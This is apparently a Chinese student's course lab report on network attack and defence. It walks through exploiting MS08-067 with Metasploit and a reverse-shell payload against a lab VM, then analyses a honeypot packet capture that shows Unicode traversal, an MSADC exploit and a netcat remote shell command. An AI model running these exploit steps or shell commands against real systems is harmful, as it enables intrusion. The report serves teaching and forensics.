20253905 2025-2026-2 《网络攻防实践》实践六报告
1.实践内容
2.实践过程
2.1 动手实践Metasploit windows attacker
- 测试连通性
![image]()
![image]()
- 在kali中输入命令
sudo msfconsole进入Metasploit
![image]()
- 输入命令
search ms08-067查看漏洞
![image]()
- 查看需要设置的参数
![image]()
show payloads显示可用的攻击负载,查看有效的攻击载荷
![image]()
![image]()
- 输入
use exploit/windows/smb/ms08_067_netapi使用相关攻击脚本,set payload generic/shell_reverse_tcp选择要用的攻击负载模块
![image]()
- 输入命令
set RHOST 192.168.32.131设置要攻击的IP,输入命令set LHOET 192.168.32.64设置本机 - 再利用命令
show options查看是否配置成功
![image]()
- 输入命令
exploit进行攻击,若出现会话连接则表示攻击成功。
![image]()
- 一步验证攻击成功,利用命令
ipconifg进行查看IP地址,通过下图可以看出,已经显示出靶机的IP地址
![image]()
2.2 取证分析实践:解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程
- 打开终端,进入文件所在目录,执行:wireshark snort-0204@0117.log
![image]()
- 利用命令
ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106进行过滤,通过下图可以看出,存在TCP连接和HTTP数据流。
![image]()
- 在117HTTP数据包中可以看到有特殊字符%C0%AF,该字符在Unicode编码中对应符号/,进而可以分析得到为Unicode攻击。攻击者利用Unicode攻击访问boot.ini文件
![image]()
- 在140数据包中可以发现攻击者想要获得msadcs.dll文件
![image]()
- 在追踪到149数据包时,发现攻击者输入数据查询语句进行SQL注入攻击
根据“ADM!ROX!YOUR!WORLD”特征字符串以及dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb的使用,可以推测出该攻击是由 msadc2.pl渗透攻击代码发起的
![image]()
- 通过后续数据包可以看到攻击者曾尝试连接FTP服务,但是账号密码错误,被拒绝连接了
![image]()
- 通过继续检查后面的数据包,发现攻击者成功建立了FTP连接
![image]()
- 后面发现攻击者通过 nc构建其一个远程 shell 通道。然后利用命令cmd1.exe /c nc -l -p 6969 -e cmd1.exe,使得攻击者连接 6969 端口,获得了访问权,并进入了交互式控制阶段。
![image]()
- 已知攻击者连接的是6969端口,因此利用命令
tcp.port == 6969进行过滤 - 攻击者在连接后进行了一系列操作:
- 看文件
![image]()
- 删文件
![image]()
- 看文本
![image]()
- 看用户
![image]()
- 写文本
![image]()
- 试图建立创建rdisk
![image]()
- 攻击者还试图通过拷贝删除har.txt的方式来提升自己的权限
![image]()
- 防范 MS08-067 漏洞攻击:安装官方补丁;封堵关键端口;部署入侵检测系统 (IDS/IPS);升级操作系统。
- 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
- 答:是,攻击者自己承认了。
![image]()
2.3 windows系统远程渗透攻击和分析
- 攻击方信息:kali,使用MS08-067 漏洞,ip地址为192.168.32.64,操作如下。
![image]()
![image]()
- 攻击方创建文件夹
![image]()
- 防守方追踪
![image]()
3.学习中遇到的问题及解决
- 问题1:攻击机和靶机设置反导致无法攻击。
![image]()
- 问题1解决方案:检查设置并更正。
4.实践总结
xxx xxx